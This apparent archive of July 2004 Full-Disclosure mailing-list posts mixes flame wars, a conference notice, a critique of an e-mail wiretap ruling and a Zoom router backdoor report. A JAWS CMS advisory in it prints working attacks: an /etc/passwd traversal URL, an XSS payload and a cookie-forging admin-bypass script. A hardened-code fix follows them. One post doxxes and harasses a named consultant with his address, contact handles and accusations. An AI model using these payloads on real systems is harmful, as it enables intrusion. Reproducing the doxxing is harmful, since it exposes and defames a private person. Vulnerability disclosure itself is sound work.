> > It was very funny to read .gov and .mil files.
> >
> > WARNING !!!
> >
> > /!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\
> >
> > Visit us:
> >
> > www.ihcteam.com
> > www.newffr.com
> > www.espionet.net
> > www.underground-fr.org
> > www.phpsecure.com
> >
> >
> > ---------------------------
> >
> > We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.
> >
> > ---- fr0g-m@n ----
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
[Full-Disclosure] full-disclosure@lists.netsys.com
From: mohr@temerity.net
Date: Mon Jul 05 2004 - 12:33:30 CDT
The whole gmail flame war kind of pisses me off. This *is*
full-disclosure. The people who state that flaws in beta software should
not be reported here are being counter-productive to the goals of this
list: release of software security holes to the general public.
If you're worried about "script kiddie sleepers" on this list, perhaps (as
another poster mentioned) you should rethink your subscription. So-called
script kiddies need access to this information if they want to learn how
these things work.
Ethics are not an issue here. We do not (AFAIK) advocate illegal
activity, and if this information is used for such purposes, that is
beyond the scope of this list. Ethics are determined on a person by
person basis and should not be applied to a large group of individuals.
Your ethics are probably vastly different from the ethics of another
individual on the other side of the globe. Face it: this information is
posted solely for release -- what is done with it is up to the end users.
In short: stop whining and go get a life -- put up or shut up.
[Full-Disclosure] New Boggles Poll.
From: Boggles (boggles@hush.com)
Date: Mon Jul 05 2004 - 12:31:27 CDT
Boggles believes that everyone should be given fair hearing.
"pardon?"
<insert canned laughter reserved for Theo here>
Boggles sad that not all Boggles posts allowed to FD.
Email Boggles if you would like the Posts that Mr(s) Moderator (will
you marry me?) won't approve (Boggles not say that FD is Moderated, just
Boggles FD is moderated.
"All" FD-posters "are created" un moderated "but some are more"
un-moderated "than others".
Boggles will resort to Altervative methods if Boggles must. (may involve
Pole dancing, Wiccan chanting, appealing to the Priory of Sion or similar)
So Boggles decided on a new poll:
If you believe the following statement is true, please email Boggles
Statement: "System Outage isn't a Prick"
Be sure to strcpy(msg->subject,"I beeleeve in a thang called luuuurve");
in your e-vote.
Poll Rules: If you are in anyway directly or indirectly linked with System
Outage you can't vote. (Inderect is defined as: "anyone who knows System
Outage exist's" [albeit in his little "I kant join duts they dun gimmah
penceel" manner.)
Boggles hope to be second successful e-vote on FD
Boggles remind everyone that BSS' vote on friend Drew Copley is still
going: drewpoll@bugtraq.org is the email address.
Boggles expects to publish the results for Boggles' poll within 24 hours,
Boggles will be using three-one-three-three-seven custom counter for
votes:
struct system_outage_vote {
unsigned vote_count:1;
}so_vote;
Boggles see no problem, hear no problem.
- --
Boggles Funniest Quotes:
"The Power of Intelligence"
++ iDefense.
++ [ Boggles wonder if this explain the power outage.]
(see shiftee, I said I could use iDefense quote!)
[Full-Disclosure] Multiples vulnerabilities in JAWS
From: nando@gigax.org
Date: Tue Jul 06 2004 - 02:19:48 CDT
check this...
/////////////////////////////////////////////////////
//// Vulnerable Program: JAWS
////
//// Version : 0.3 ; it's BETA probably ;)
////
//// Url: http://www.jaws.com.mx
////
//// The Bug: Multiples vulnerabilities
////
//// Date: Today, July 5 of 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando@gigax.org
//////////////////////////////////////////////////////
I. Affected software description:
Jaws is a Framework and Content Management System for building dynamic
web sites. It aims to be User Friendly, giving ease of use and lots of
ways to customize web sites, but at the same time it is Developer
Friendly: it offers a simple and powerful framework to hack your own
modules. Jaws is Free Software under the GPL.
note: to hack your own modules, to hack your own modules, to hack your
own modules... ;)
II. Bugs
There are some vulnerabilities in the JAWS code; they were fixed quickly
by its main coder.
1) Full path disclosure ...
There are many ways to determine the full path to the web root directory:
a) http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc
Specifying a path variable that does not exist.
b) function jaws_error($text, $file, $line)
   {
       print ("<b style=\"color: #f00;\">JAWS Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.", line ".$line);
       exit;
   }
The jaws_error() function returns the line number and the full path of
the file.
c) http://127.0.0.1/jaws/include/config.php
Trying to open some file in the include directory.
2) Arbitrary file browsing.
We can access a file's content through the gadget variable.
http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc
This line shows us the passwd file.
The use of the "path" variable is irrelevant; in the code a line like
the following can be seen:
$path = str_replace("..", "", $path) --> this way the content of path is
filtered, but in the index.php file the "gadget" variable is not
filtered.
The "%00" is necessary because the script appends the extension ".php"
to the value of the "gadget" variable.
3) XSS (the fashionable word)
Cross-site scripting in the action variable, because the script returns
the content of the variable:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>
In index.php the vulnerable code is:
jaws_error ("Invalid operation: You can't display this action
[".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__);
where "$go_gadget->action" contains the erroneous action.
4) Validation without a password :)
There exists a way that allows us to get into the control panel with
administrator rights without a password.
The admin.php file has:
//
if ($GLOBALS["app"]->logged_on())
{
    control panel code...
    ...
}
//
The logged_on() function is in the application.php file.
The function's code:
//
function logged_on()
{
    return (md5($_SESSION["logged"]) == $_COOKIE["logged"]);
}
//
It is strange to see this type of validation, but there it is!
Before entering the Control Panel, the $_SESSION["logged"] variable has
a null ("") value.
A possible way to exploit it would be:
//BEGIN
//exploit.php
<?PHP
setcookie("logged", "d41d8cd98f00b204e9800998ecf8427e", time()+86400*365, 'path to jaws');
?>
//END
Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash of the null value.
This way we can create a cookie (that looks like it came from the remote
system) and then try the URL:
http://127.0.0.1/jaws/admin.php
and we will be inside.
III. Solution
The main coder was contacted and the code was fixed in the CVS ;).
IV. Greetings
- Greets to GIGAX people.
- Greets to all the community. I learn from you!
V. Contact
Fernando Quintero
nando@gigax.org
Medellín-Colombia
VI. Final words
- Sorry for the English and !!! Viva Colombia !!!!!!!!
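Hardened counterparts of the three snippets the advisory quotes (the logged_on() check, the gadget include, and jaws_error()), as an added example in PHP 8; this is not code from the advisory or the JAWS project, and the gadget names in the allow-list, the $gadgetDir argument and the session keys are assumptions:

```php
<?php
// Added example, not JAWS project code: hardened counterparts of the three
// snippets quoted in the advisory. GADGETS, $gadgetDir and the session
// keys are assumptions.
declare(strict_types=1);

// 1) Authentication state is kept only in the server-side session.
//    The original compared md5($_SESSION["logged"]) with a cookie the
//    client controls, so md5("") satisfied it before any login.
function logged_on(): bool
{
    return isset($_SESSION['logged']) && $_SESSION['logged'] === true;
}

// 2) The "gadget" parameter must match an allow-list, and the resolved
//    file must stay inside the gadget directory, so "../" and "%00"
//    never reach include().
const GADGETS = ['filebrowser', 'blog', 'contact'];   // assumed gadget names

function gadget_file(string $gadget, string $gadgetDir): ?string
{
    if (!in_array($gadget, GADGETS, true)) {
        return null;                                // unknown or tampered name
    }
    $base = realpath($gadgetDir);
    $real = realpath($gadgetDir . '/' . $gadget . '.php');
    if ($base === false || $real === false) {
        return null;                                // directory or file missing
    }
    // realpath() has already resolved ".." and symlinks; the prefix check
    // rejects anything that resolved outside the gadget directory.
    return str_starts_with($real, $base . DIRECTORY_SEPARATOR) ? $real : null;
}

// 3) Error output HTML-escapes untrusted text and keeps the absolute path
//    out of the response; file and line go to the server log instead.
function jaws_error_safe(string $text, string $file, int $line): string
{
    error_log(sprintf('JAWS error: %s (%s:%d)', $text, $file, $line));
    return '<b style="color: #f00;">JAWS Error:</b><br/>'
         . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Self-check with constructed inputs (run: php hardened_jaws.php).
function self_check(): bool
{
    $ok = true;

    // The advisory's bypass: md5("") cookie against an empty session.
    $_SESSION = [];
    $_COOKIE['logged'] = 'd41d8cd98f00b204e9800998ecf8427e';
    $ok = $ok && !logged_on();
    $_SESSION['logged'] = true;
    $ok = $ok && logged_on();

    // Traversal with a null byte, and a legitimate gadget, against a temp dir.
    $dir = sys_get_temp_dir() . '/jaws_gadgets_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/blog.php', "<?php\n");
    $ok = $ok && gadget_file("../../../../../../etc/passwd\0", $dir) === null;
    $ok = $ok && gadget_file('blog', $dir) === realpath($dir . '/blog.php');
    unlink($dir . '/blog.php');
    rmdir($dir);

    // The advisory's XSS payload is neutralised and the path is not echoed.
    $html = jaws_error_safe("<script>alert('x');</script>", __FILE__, __LINE__);
    $ok = $ok && !str_contains($html, '<script>') && !str_contains($html, __FILE__);

    return $ok;
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "all checks passed\n" : "CHECK FAILED\n";
}
```

The design point shared by all three functions is that nothing the client sends is compared with anything derived from the client's own input: the login flag exists only in the session, the gadget name must match the allow-list before it is ever used to build a path, and error text is escaped and stripped of the absolute path before it leaves the server.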
Re: [Full-Disclosure] Successful in blocking all known exploits
From: stephane nasdrovisky (stephane.nasdrovisky@paradigmo.com)
Date: Tue Jul 06 2004 - 03:01:06 CDT
Maarten wrote:
>On Saturday 03 July 2004 18:25, J.A. Terranson wrote:
>
>
>>On Sat, 3 Jul 2004, RandallM wrote:
>>
>>
>>>After a number of years, much thought,and long nights I have developed a
>>>systematic method to prevent and thwart exploits on my system!
>>>
>>>NEVER REBOOT!
>>>
>>>up and running for 876 days straight and have had no problems
>>>
>>>
>>>
>>Yeah, but what about Windowz boxes?
>>
>>
I've seen one (pdc) alive for +- 2 years. The administrator didn't
believe me when I said the latest issue (a stupid thing I don't remember,
such as no authentication possible anymore) he was facing would
-probably- be solved by a reboot (My limited NT experience is: reboot
twice (at least), watch the screen with 3-4 colleagues (at least); if the
issue is not solved by these 2 magic keys, spend some time but do not
spend too much time trying to understand what's happening: it's usually
a waste of time).
>Hum, how did you guess he isn't talking about a windows box ? 8-))
>
>
Did he mean never reboot or never boot? In the 2nd case, I guess most of
you will agree. The same kind of thing applies to infrastructures: aren't
air gap firewalls one of the most secure pieces of hardware?
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA
From: harry (Rik.Bobbaers@cc.kuleuven.ac.be)
Date: Tue Jul 06 2004 - 03:04:18 CDT
Rudolf Polzer wrote:
> I didn't expect that you will actually write that since today is
> nowhere April 1st.
>
> If you now find a DoS in a Brainf*** interpreter by coding an endless
> loop in Brainf*** you are the first one on my gmail killfile - until
> Mar 31st, 2005. Finding the code for an endless loop in Brainf*** will
> be your own problem.
now it's time to quote you, rudolf... on his (frogman) last
"vulnerability disclosure" with php's include() function, you wrote:
<quote from divzeroATgmailDOTcom on 07/03/2004 06:19 PM>
So your next advisory will be about a BIGBUG in system() - when badly
used, an attacker can execute arbitrary code on your webserver?
</quote>
as you can see... this froggyman is just a kiddie asking for some
attention. interesting for other kiddies and beginners, but absolutely
useless for this list (imho)
--
harry
aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers@cc.kuleuven.ac.be -=- http://harry.ulyssis.org
"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3peoples on internet) !!! 0DAY EXPLOIT !
From: Othman Nasrou (sleem@altaserv.homeip.net)
Date: Mon Jul 05 2004 - 19:03:21 CDT
> IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr.
> Frog-m@n !!!!
Well, I am from the IHC Team. Those people that wrote down stupid things
like that are just trying to discredit us. I think everyone here knows
that kind of "black hat" that are just trying to look rebels with their
"no disclosure".
It's not the first time that IHC Team and Frog-Man (webmaster of
phpsecure.info) have been attacked by these guys... It seems that they
won't grow up. What a pity!
I'm really afraid I didn't mean to answer the first mail about us, I
guess that this mailing list is not made for things like that, but I
had to say to everyone that we're not concerned by these posts...
They're just trying to make fun... How funny it is...
Sorry,
Best Regards,
Othman Nasrou aka Sleem,
http://www.ihcteam.org/
[Full-Disclosure] Boggles Delayed Advisories presents: so1o
From: Boggles (boggles@hush.com)
Date: Tue Jul 06 2004 - 03:06:11 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -
Boggles Special:
- --
Boggles has Hangover this morning.
Boggles would like to apologise to world for not Oreilly-ing advisories
earlier.
Boggles has managed to focus half a retina to decode Boggles' Inbox.
Boggles appreciate the fan mail. But if Boggles Fans not careful Boggles
have to sell Full-Disclosure email's to iDefense to pay for more mailbox.
(With the exception of System Outage email, even iDefense would think
uber Boggles was taking the Spitzner)
P.S Boggle's luv u all (mostly).
So, without further a do or don't:
Boggle's Delayed Reaction Advisorys are proud to present:
A Boggles Special:
*********************************************
!SPECIAL BOGGLES SPECIAL BOGGLES SPECIAL!
*********************************************
<so1o> got my first book copy from oreilly today
++ Boggles knew he should have done something about that.
++ Boggles is sorry for failing the community and letting so1o
++ publish.
++ Boggles Hopes he can make up for this by asking the English
++ Government
++ why so1o's company was in liquidation, hadn't filled in a tax
++ return, but was still trading. (companieshouse.gov.uk)
<so1o> i hate report writing
++ Boggles think he mention this already.
++ Boggles doesn't like so1o
++ (Boggles jealous, Boggles want Beastiality Book cover.)
++ So Boggles is going to include more so1o information.
Name: Chris McNab
Company: Matta Consulting Limited
Email: chris.mcnab
trustmatta.com
Company website: trustmatta.com
Domain registrant: (Boggles good with `whois`!!)
Matta Security
18 Duncan Terrace
London London
N1 8BZ
UK
nickbaskett
hotmail.com
++ Boggles visit London.
(I didn't meet the queen tho,
On that topic, who seen Spitzner lately?)
Name & Registered Office :
MATTA CONSULTING LIMITED
314 5102
ST JAMES BARTON
BRISTOL
AVON BS1 3LY
Status :Active(ly wh0ring). [Boggles didn't at that, honest.]
Company No. :03629907
Date of Incorporation : 11/09/1998
Country of Origin : United Kingdom
Company Type: Private Limited Company
Nature Of Business (SIC(92)):
7487 - other business activities [wh0ring]
Accounting Reference Date : 30/09
Last Accounts Made Up To : 30/09/2002 (TOTAL EXEMPTION FULL)
Next Accounts Due : 30/07/2004 [ohh, Boggles enjoy 'dem!]
Last Return Made Up To : 11/09/2003
Next Return Due : 09/10/2004
Last Members List : 11/09/2003 [#phrack]
Previous Names [Christina]
Date of Change : Previous Name :
25/04/2003 NETWORK SECURITY SOLUTIONS LTD.
Branch Details
There are no branches associated with this company.
[If statements would be too ub3r]
Oversea Company Information
There are no Oversea Details associated with this company.
[Oh, dat's a fib]
Boggles suggest groups.google.com for nickbaskett
hotmail.com (it
funny).
using his signature:
"many thanks, Nick Baskett" is funnier. play "follow the work trail"
Boggles enjoy that game.
Chris says he works with the British "High Tech Crime Unit"
(yes the ones who took months to bring the site live because they
were.."concerned about security")
Boggles spoke to LOTS of people.
Boggles think's Chris tell weeny fibblet
Chris should pay ALL money that he has made
(potentially illegally if he hasn't done his paperwork)
to the Amazon rainforest. He has wasted so many _FSCKING_
trees copying and pasting from the internet.
Boggles is sorry to the kids for using nasty word like "amazon".
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkDqXXUACgkQ2IK15vxw2kMfPQCfTcqZ+sbiEOPQe0BldNaZp/ABA50A
oIuyRzp3TkDor/VEjSSTT1zbrgTA
=/BWP
-----END PGP SIGNATURE-----
[Full-Disclosure] RE: Public Review of OIS Security Vulnerability Reporting and ResponseGuidelines
From: Thomas48 (thomas48@singnet.com.sg)
Date: Tue Jul 06 2004 - 05:39:48 CDT
Dear all
Finally there's going to be a true blue security conference in Singapore
that is product and vendor neutral.
The Symposium on Security for Asia Network (SyScAN '04) would be held on
16th - 17th December 2004 in Singapore. SyScan '04 would be held at the
beautiful Swissotel Merchant Court Hotel, which is located a stone's throw
away from the financial and the pub districts, and 10 minutes away from the
famous shopping belt of Orchard Road.
SyScAN '04 boasts a list of expert speakers in their various fields, coming
from US and Europe and the topics would be scintillating and mesmerising.
SyScAN '04 would be a wonderful avenue for all security enthusiasts from all
over the world, especially those from Asia, to gather and fraternise.
Please do visit www.syscan.org for more information and register.
Thanks!
*********************************************
Organising Committee
SyScAN '04
Confidentiality Notice: This e-mail transmission may contain confidential or
legally privileged information that is intended only for the individual or
entity named in the e-mail address. If you receive this e-mail in error,
please delete this message immediately. Further, you should not re-transmit,
copy, store, or reveal the contents of this message to any third party.
-----Original Message-----
From: fred@mobach.nl [mailto:fred@mobach.nl]
Sent: Monday, July 05, 2004 2:57 AM
To: bugtraq@securityfocus.com
Cc: OIS; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; full-disclosure@lists.netsys.com
Subject: Re: Public Review of OIS Security Vulnerability Reporting and
Response Guidelines
OIS wrote:
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.
I have problems with the OIS guidelines as I distrust at least one
member of OIS since it won't publish verifiable information on Bugtraq
since some years. When I combine the policy of that company with the
next statement from OIS's about.html page
"Does OIS support pre-disclosure of vulnerability information to select
groups?
No. We believe the software author should be given a chance to create a
fix before vulnerability information is made public, but that there
should be no further distribution of that information until the fix is
complete. This principle can be very difficult to adhere to in certain
situations, such as dealing with the open source community where there
aren't protections to keep vulnerability information secret."
I am afraid that that company might take years to supply a fix or even
to never supply that. A limit of at most four weeks before disclosure
seems reasonable to me. If that company cannot live with that it can opt
to die.
Another interesting point for me is the statement about the open source
community in the same paragraph. Some organizations still have problems
with that community, which is reflected by adopters.html webpage of OIS.
No representation of the open source community as far as I can see. But
please correct me if I am wrong.
--
Fred Mobach - fred@mobach.nl - postmaster@mobach.nl
Systemhouse Mobach bv - The Netherlands - since 1976
website : http://fred.mobach.nl
Q: servos ad pileum vocare ?
A: servos fenestrae ad pileum rubrem vocare !
---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.708 / Virus Database: 464 - Release Date: 6/18/2004
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.708 / Virus Database: 464 - Release Date: 6/18/2004
[Full-Disclosure] Beta Advisories
From: System Outage (system_outage@yahoo.com)
Date: Tue Jul 06 2004 - 05:56:18 CDT
If you do a query on the BUGTRAQ archive you'll see no mention of Gmail and I'm sure that's not because people haven't been attempting to post about Gmail, but because the moderators think Gmail is beta. I bet once Gmail is launched as a public service, the BUGTRAQ moderators will allow Gmail advisories.
Cheerio
---------------------------------
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
[Full-Disclosure] Re: [ISN] E-Mail Snooping Ruled Permissible
From: Jason Coombs (jasonc@science.org)
Date: Tue Jul 06 2004 - 07:37:38 CDT
Anyone who has not read this appeals court decision should do so now.
http://www.ca1.uscourts.gov/pdf.opinions/03-1383-01A.pdf
The stipulated facts make it clear that the government failed to hire an
expert witness who knows how SMTP, POP3, sendmail, procmail, DNS, MTA,
MUA, HTTP, Web browsers, computers, hard drives, software, RAM and the
Internet actually work.
Take, for instance, page 3, where both parties stipulate that the
following is true:
"Once the e-mail is accessible to the recipient, final delivery has been
completed."
Every person who is reading this message should be able to stipulate
that final delivery was not complete until a Mail User Agent retrieved
it from temporary storage on the mail server. If you're using Webmail
then your browser is your MUA and it speaks HTTP rather than POP3. That
was the case with Interloc e-mail accounts.
Yet the court and the parties managed to agree that final delivery is
complete any time the message is in the possession of an MTA that
happens to consider itself to be the last hop in the delivery route.
Never mind that there must be one more delivery step where an MUA under
user control receives the message on behalf of the user.
The fact that the mail server may arbitrarily expire old messages and
take other actions that disrupt the final delivery to an MUA was clearly
of no concern to anyone in this case.
I can't imagine ever stipulating that once my mail messages are touched
by procmail final delivery is complete. That's like saying once the
incoming mail truck arrives at my local post office and the mail sort is
done and my mail is placed in a stack with a rubber band around it that
final delivery is complete. All I have to do now is go to the post
office and remind them that they didn't bother to deliver my mail today
and I'll be given access to the stack, right? Therefore final delivery
is complete once the stack is created that has my name on it?
Nobody cares about getting the message delivered to a program that is
under the control of the recipient, apparently.
The only storage location that can be considered to be final delivery of
an e-mail message is a storage location that is under the control of the
recipient. An inbox on the recipient's hard drive would be a fine
indication of final delivery. To even approach a proper stipulation of
facts with respect to the subtle distinction between Web-based e-mail
services, which are closer to post office boxes, and POP3-based e-mail
services, which are closer to conventional postal mail delivery to your
home, requires mention of POP3 and the role of the MUA, both of which
are missing from the stipulation made by the parties.
The dissenting opinion, page 18, includes discussion of MUA but it
asserts that the MUA in this case was procmail. One would hope that the
voice of reason would at least get its facts straight when everyone else
was lost or confused. Too bad in this case the voice of reason was
clueless, too.
The court correctly points out that Congress intentionally exempted
stored electronic communication from the definition of "electronic
communication" in section 2510(12) of 18 U.S.C. There is no other reason
than this intentional exemption that the appeals court ruled as they did
in this case, and given the facts as they were presented by the parties
the ruling was proper.
However, an e-mail message goes from electronic storage on a hard drive
to electronic storage in RAM and then back to electronic storage on a
hard drive again by passing through wires. The government should have
argued that the procmail program intercepted electronic communications
by causing stored electronic communications to once again be transmitted
over wires. But for stimulating that transmission over wires the
procmail system would not have been able to access the second set of
stored electronic communications THAT THE PROCMAIL PROGRAM ITSELF
CAUSED. In reality the procmail program was creating an echo and
capturing the echo. That you cannot do this in other wiretap scenarios
and thereby avoid the Wiretap Act should have made the court examine
this more closely.
This case should have set the precedent that causing a stored electronic
communication to be transmitted over wires to a different electronic
communication storage temporarily "on-demand" in order to circumvent the
Wiretap Act is not acceptable. The exemption on stored electronic
communications that came from Steve Jackson Games v. U.S. Secret Service
should not be applied to "live" electronic communications systems that
can be induced to "echo" stored electronic communications but rather the
Steve Jackson Games precedent should apply only to "dead" storage that
must be reactivated, powered up from an off condition and examined
directly, without causing an echo, in order for the stored electronic
communications to be accessed.
Steve Jackson Games should continue to exempt forensic investigators
from prosecution or civil liability, and keep true "stored electronic
communications" accessible to law enforcement and the prosecution in
criminal cases. It is necessary for there to be some exemption otherwise
it would be impossible for law enforcement to ever look at any hard
drive without obtaining a wiretap authorization that specifically names
every party whose stored communications are found on the drive when it
is analyzed. However, the exemption that this court ruling suggests we
must learn to live with is not an exemption that is sensible or that is
consistent with the full truth of the matter.
The court in this case was not given the opportunity to consider this
view because the technical stipulations of fact were so badly flawed. I
would be satisfied with the outcome of this appeal had the technical
stipulations and reasoning been proper, yet they were not. We still do
not know how a court might rule if the correct and true technical
stipulation is made in a similar case. We do know that it will be more
difficult to get another appeal heard on the matter, as other courts
will tend to defer to this appeal unless somebody intelligent manages to
explain these issues clearly at just the right time.
It is disturbing to see how poor the quality of computer expert
testimony is in court, and how little effort is put into clarifying the
reality behind technical issues. When the parties stipulate to things
that are not the truth, or when either side is technically inept, it
causes courts to make errors. Then we end up with bad precedent.
Sincerely,
Jason Coombs
jasonc@science.org
[Full-Disclosure] backdoor menu on conexant chipset dsl router (Zoom X3)
From: Adam Laurie (adam@algroup.co.uk)
Date: Tue Jul 06 2004 - 07:37:44 CDT
i have just installed an adsl modem sold under the brand of Zoom X3
http://www.zoom.com/products/adsl_overview.html
and was appalled to find that an nmap scan of the external address
immediately came up with the following:
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
254/tcp  open  unknown
255/tcp  open  unknown
ports 23 and 80 give access to the configuration menu and html interface
as would be expected, but, although you can control access to the html
interface, there is no control over the telnet port other than password.
worse still, telnetting to port 254 gives you access to another menu,
which identifies itself as "ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
3.27", and uses the *DEFAULT* HTML management password, even if you have
changed it to something else. i.e. changing the HTML password does not
change this one. from this menu you can change DSL settings and issue a
complete "Factory Reset". there is a menu option to change the password,
but this does not appear to work.
port 255 accepts connections, but I have not investigated further.
at the minimum this carries a risk of a trivial DoS attack (factory
reset and everything stops working), and may actually have other more
serious implications.
i am disgusted that in this day and age products like this are still
being shipped with such basic insecurities, and, accordingly, will not
be wasting my time by looking into it any further, and will be taking
the router back and exchanging it for something (hopefully) better
thought out.
to their credit, Zoom responded immediately with a workaround when i
reported the problem, so they are clearly already aware. fyi, the
workaround is to create dummy "Virtual Servers" on each of the ports
that blackhole any incoming connections. this appears to work.
Conexant lists several other high profile retail modem manufacturers and
pc oems, so i leave it as an exercise for the reader to work out other
manufacturer/vulnerability combinations.
http://www.conexant.com/support/md_supportlinks.html
enjoy,
Adam
--
Adam Laurie            Tel: +44 (20) 8742 0755
A.L. Digital Ltd.      Fax: +44 (20) 8742 5995
The Stores             http://www.thebunker.net
2 Bath Road            http://www.aldigital.co.uk
London W4 1LT          mailto:adam@algroup.co.uk
UNITED KINGDOM         PGP key on keyservers
Re: [Full-Disclosure] Web sites compromised by IIS attack
From: Barry Fitzgerald (bkfsec@sdf.lonestar.org)
Date: Tue Jul 06 2004 - 08:33:51 CDT
Maarten wrote:
>On Friday 02 July 2004 23:33, Barry Fitzgerald wrote:
>
>
>>
>>No, I'm not wrong.
>>
>>The discussion is about who's responsible for support of said software.
>>There's no obligation through the GNU GPL that support is required if
>>money changes hands, however the point of the discussion is who's
>>responsible for support of said software in a situation where the
>>software produced is broken and supported.
>>
>>Red Hat sells support. The act of taking binaries and actively and
>>intentionally redistributing them is a support service.
>>
>>
>
>Well that is open to debate. If I just download Redhat, they make no money
>off me. Do they still have to fix my software then ? Are they responsible ?
>
>
Nope - it's the act of exchanging money for the support contract that
makes them obligated to provide said support.
-Barry
Re: [Full-Disclosure] Beta Advisories
From: Henrik Persson (nix@syndicalist.net)
Date: Tue Jul 06 2004 - 08:47:32 CDT
On Tue, 2004-07-06 at 12:56, System Outage wrote:
> If you do a query on the BUGTRAQ archive you'll see no mention of
> Gmail and I'm sure that's not because people haven't been attempting
> to post about Gmail , but because the moderators think Gmail is beta.
> I bet once Gmail is launched as a public service, the BUGTRAQ
> moderators will allow Gmail advisories.
Perhaps. But this _is_ full-disclosure, not bugtraq. This is FULL
disclosure.
I'm lazy, too lazy to just filter you out. Stop posting garbage,
garbage! ;/
--
Henrik Persson <nix@syndicalist.net>
[Full-Disclosure] Bugs, worms and IPO originate from silicon, rather than bad software.
From: Feher Tamas (etomcat@freemail.hu)
Date: Tue Jul 06 2004 - 09:09:52 CDT
Bugs, worms and IPO originate from silicon, rather than bad software:
http://molecularexpressions.com/creatures/pages/roach.html
http://molecularexpressions.com/creatures/pages/canoworms.html
http://molecularexpressions.com/creatures/pages/disclaimer.html
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"
From: Barry Fitzgerald (bkfsec@sdf.lonestar.org)
Date: Tue Jul 06 2004 - 09:27:40 CDT
joe wrote:
>Couple of things.
>
>1. The conversation you are referring to was a conversation about issues
>with core base components that necessitated a complete redesign. You kept
>bringing up items that were NOT core base components - they were UI
>components. IE being one of them. The very fact that you have a choice to
>use a different browser should help you understand that. Try to use a
>different ACL system on Windows NT based systems and tell me how that goes.
>
>
>
The choice to use a different browser doesn't imply that IE isn't a core
base component at all.
Is it a part of the kernel? No...
Is it completely unremovable? Of course not...
Is it a part of the standard Windows UI? Yes...
Is it impossible to remove easily and difficult to remove cleanly? Yes...
Will removing it make many programs operate incorrectly? Yes...
I think you see where I'm going with this. It's a core component in MS
Windows, though it may not be a part of the OS kernel, it is,
nonetheless, undebatably, a core component of MS Windows as a software.
Keep in mind, IE is more than just a simple executable. The DLLs that
it uses are built to be used by other portions of the system and are
extensively used. Of course, this is the nature of DLLs.
-Barry
[Full-Disclosure] [OpenPKG-SA-2004.030] OpenPKG Security Advisory (png)
From: OpenPKG (openpkg